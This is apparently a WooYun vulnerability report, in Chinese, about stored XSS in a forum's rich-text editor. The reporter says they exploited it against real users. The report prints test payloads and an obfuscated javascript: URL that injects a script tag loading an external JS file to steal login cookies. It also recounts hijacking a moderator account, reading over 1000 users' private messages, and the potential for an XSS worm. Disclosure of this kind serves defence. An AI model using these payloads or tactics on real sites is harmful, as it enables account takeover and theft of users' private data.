WooYun.org

漏洞位置：论坛发帖回帖富文本编辑器
漏洞危害：
1 盗取用户登录cookie并成功登录
2 论坛等位置xss蠕虫
3 盗取管理员帐号获得大量敏感信息和操作权限
详细过程这里分两个部分：
一、XSS的挖掘分析
1 首先是看到一些储存型xss漏洞只给1rank比较气愤，觉得厂商不重视，在看到二哥gainover的回复，决定去挖掘实例让厂商引起对xss的重视度。传送门： WooYun: 偶然发现的卡卡论坛存储型xss...

2 开始xss挖掘过程，这里我定位到论坛的发帖回帖富文本编辑器位置。因为论坛的用户量比较大，而且富文本编辑器位置往往容易出现xss。测试的时候，一般随便选一个帖子在回复位置测试，不要去发帖子测试。因为回帖和发帖的位置一般都用的是一个富文本，回帖位置比较隐蔽，不易被发现。
3 先直接测试有没有过滤常用xss代码，输入

</textarea>'"><img src=1 onerror=alert(1)>

发现被直接输出了，看来常用的xss代码是有过滤的。F12看了一下输出点，也没有找到其他什么可以构造的xss点。

4 下来就测试一下其他位置吧，随便输入一些字符，试了试插图，这里也过滤了。

5 然后在发帖后点击编辑，看到了这里多了个插入视频选项，这下眼前一亮诶。

6 看到这个论坛的模式和编辑器很像discuz phpwind那些，所以果断插入代码：javascript:alert(1) 文件类型选择mp3

7 确认保存提交修改内容，吼吼，弹窗了。

8 F12看一下，发现这里是用到<embed>标签，所以可以直接在src位置利用javascript加载js代码。

9 好的，XSS的挖掘分析到此结束。
二、XSS的利用分析
1 首先F12看了下，发现论坛的cookie是没有http-only的，那么只要能xss到cookie，理论上来说就可以利用用户的登录cookie去登录用户帐号。

2 所以发了一个带有盗用用户cookie的xss的帖子（帖子的标题是为了引诱管理员过来）。
利用代码为：

javascript:with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='外部js文件地址'

3 自己先试了试可以成功获取到cookie，然后不一会就收到了一些cookie（由于是自动加载，所以只要访问帖子就会中招）。

4 利用xss到的cookie，成功登录的用户帐号。

5 看了下，果然是因为访问了那个帖子中招的。

6 再看了看信息，呵呵，完全和我计划的一样，搞的了大版主帐号。

7 下面就是利用大版主的帐号可以干的事情了，由于cookie没有http-only，而且是一站式cookie，所以能干的事情也蛮多的额。
对任意用户进行禁言等操作

对任意帖子进行删除、指定、加精等操作

短消息邮箱里面的1000多条用户的安全信息及隐私信息

瑞星网站的其他站点的业务操作

8 看了一下，论坛的发帖回帖等操作都是没有token等参数的，所以可以蠕虫，这里不在详细进行展示了。如需验证，可以私下联系我。